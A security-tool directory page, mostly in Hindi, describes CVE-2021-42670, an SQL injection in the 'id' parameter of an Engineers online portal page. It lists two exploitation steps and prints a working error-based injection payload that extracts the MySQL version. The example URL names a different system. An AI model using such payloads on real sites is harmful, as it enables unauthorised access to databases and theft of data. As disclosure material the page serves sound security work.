Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-42670 — CVE-2021-42670 - SQL Injection vulnerability in the Engineers online portal system. | Kitploit
उपकरण/GitHubGitHub/0xdeku/cve-2021-42670
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingDatabase Security
GitHub0xdeku/cve-2021-42670

CVE-2021-42670

CVE-2021-42670 - SQL Injection vulnerability in the Engineers online portal system.

रिपॉजिटरी देखें
214 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-42670

CVE-2021-42670 - इंजीनियर्स ऑनलाइन पोर्टल सिस्टम में SQL इंजेक्शन भेद्यता।

तकनीकी विवरण:

इंजीनियर्स ऑनलाइन पोर्टल में एक SQL इंजेक्शन भेद्यता मौजूद है। एक हमलावर "announcements_student.php" वेब पेज में मौजूद कमजोर "id" पैरामीटर का लाभ उठाकर किए गए SQL क्वेरी में हेरफेर कर सकता है। परिणामस्वरूप, हमलावर वेब सर्वर से संवेदनशील डेटा निकाल सकता है।

प्रभावित घटक -

भेद्य पृष्ठ - announcements_student.php

भेद्य पैरामीटर - "id"

शोषण के चरण:

  1. http://localhost/nia_munoz_monitoring_system/announcements_students.php पर जाएं
  2. id पैरामीटर में अपना पेलोड डालें

प्रूफ ऑफ कॉन्सेप्ट (PoC) -

निम्नलिखित पेलोड आपको वेब सर्वर पर चलने वाले MySql सर्वर संस्करण को निकालने की अनुमति देगा -

root@kitploit:~
1' AND (SELECT 4356 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(MID((IFNULL(CAST(VERSION() AS NCHAR),0x20)),1,51)),0x7178786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pMLo'='pMLo

CVE-2021-42670

संदर्भ -

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42670

https://nvd.nist.gov/vuln/detail/CVE-2021-42670

खोजकर्ता -

Alon Leviev(0xDeku), 22 अक्टूबर, 2021.

टूल डाउनलोड करें